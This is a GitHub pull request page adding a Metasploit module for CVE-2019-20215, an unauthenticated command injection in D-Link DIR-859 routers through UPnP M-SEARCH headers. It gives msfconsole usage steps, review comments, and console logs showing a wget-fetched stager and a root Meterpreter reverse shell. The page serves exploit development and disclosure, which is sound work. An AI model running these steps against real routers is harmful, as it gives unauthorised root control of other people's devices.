Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cve 2019 20215 #12887

Merged
merged 5 commits into from Feb 5, 2020
Merged

Cve 2019 20215 #12887

merged 5 commits into from Feb 5, 2020

Conversation

@s1kr10s
Copy link
Contributor

s1kr10s commented Jan 28, 2020

Introduction

This module exploits CVE-2019–20215, an unauthenticated remote injection of operating system commands. The vulnerability was found in the ssdpcgi() function, and the payload can be injected through either the UUID or URN headers of a M-SEARCH UPnP request.

Vulnerable Application

Get a D-Link DIR-859 router (or any of the devices/firmware versions mentioned here), or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar emulation frameworks.

Verification Steps

  1. Set up router/emulated device
  2. Start msfconsole
  3. Do: use exploit/linux/upnp/dlink_dir859_exec_ssdpcgi
  4. Do: set RHOSTS <router_ip>
  5. Do: set LHOST <local_ip>
  6. Do: set TARGET <URN/UUID>
  7. Do: run
  8. You should get a session as root.

Scenarios

D-link DIR-859 Firmware 1.05

msf5 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > run 
[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Using URL: http://0.0.0.0:8080/38YWEX2
[*] Local IP: http://192.168.70.28:8080/38YWEX2
[*] Target Payload URN
[*] Client 192.168.0.1 (Wget) requested /38YWEX2
[*] Sending payload to 192.168.0.1 (Wget)
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:41057) at 2029-12-31 14:15:22 -0300
[*] Server stopped.
meterpreter > 

(Was PR #12769 @space-r7 @bcoles )

s1kr10s added 2 commits Jan 28, 2020
Staged, uses meterpreter
@space-r7 space-r7 self-assigned this Jan 28, 2020
s1kr10s added 2 commits Feb 4, 2020
... replace 'Targets' for a new option, and format 'header', as suggested in the review.
...  as stager flavor and silence msftidy error.

register_options(
[
Msf::OptEnum.new('VECTOR',[true, 'Header thrugh which to exploit the vulnerability', 'URN', ['URN', 'UUID']])

This comment has been minimized.

Copy link
@space-r7

space-r7 Feb 5, 2020

Contributor
Suggested change
Msf::OptEnum.new('VECTOR',[true, 'Header thrugh which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Feb 5, 2020

Tested on emulated v1.05 firmware:

msf5 > use exploit/linux/upnp/dlink_dir859_exec_ssdpcgi 
msf5 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > set rhosts 192.168.0.1
rhosts => 192.168.0.1
msf5 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf5 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > options

Module options (exploit/linux/upnp/dlink_dir859_exec_ssdpcgi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.0.1      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    1900             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VECTOR   URN              yes       Header through which to exploit the vulnerability (Accepted: URN, UUID)


Payload options (linux/mipsbe/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf5 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > run

[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Using URL: http://0.0.0.0:8080/wP1bgrL7
[*] Local IP: http://127.0.0.1:8080/wP1bgrL7
[*] Target Payload URN
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Client 192.168.0.1 (Wget) requested /wP1bgrL7
[*] Sending payload to 192.168.0.1 (Wget)
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:46802) at 2020-02-05 09:58:21 -0800
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.1
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > 

space-r7 added a commit that referenced this pull request Feb 5, 2020
@space-r7 space-r7 merged commit de25920 into rapid7:master Feb 5, 2020
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Feb 5, 2020

Release Notes

This exploits an unauthenticated command injection vulnerability for a subset of D'link routers. Passing commands through either the uuid header or the urn header in an M-SEARCH request gets passed unsanitized to system(), allowing for code execution on the target.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

5 participants
You can’t perform that action at this time.